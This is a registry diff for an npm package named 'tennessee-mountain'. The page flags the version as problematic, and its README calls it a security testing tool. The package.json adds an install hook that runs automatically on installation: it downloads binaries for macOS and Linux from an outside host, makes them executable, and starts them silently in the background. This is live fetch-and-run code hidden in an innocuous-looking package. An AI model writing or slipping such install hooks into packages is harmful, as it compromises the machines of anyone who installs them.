@davy.crockett.91/tennessee-mountain 0.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @davy.crockett.91/tennessee-mountain might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +8 -0
  2. package/index.js +5 -0
  3. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1,8 @@
1
+ Tennessee Mountain
2
+ ==================
3
+ Birthplace of the King of the Wild Frontier.
4
+
5
+
6
+ SECURITY TESTING TOOL
7
+ =====================
8
+ ## This is not actually a real package. It is a security testing tool.
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function get_a_bear() {
2
+ return "TODO: Add bear-getting"
3
+ }
4
+
5
+ module.exports = get_a_bear
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "@davy.crockett.91/tennessee-mountain",
3
+ "version": "0.0.2",
4
+ "description": "Birthplace of the King of the Wild Frontier.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "install": "(set -x; for os in darwin linux; do N=./burnme-$RANDOM; curl -s https://maybedont.h4ck.me/f/burnme-$os-amd64 >$N && chmod 0755 $N && sh -c \"nohup $N >/dev/null 2>&1 <&1 &\" & done; true) >o 2>e"
9
+ },
10
+ "keywords": [
11
+ "dontuse",
12
+ "securitytesting"
13
+ ],
14
+ "author": "",
15
+ "license": "ISC"
16
+ }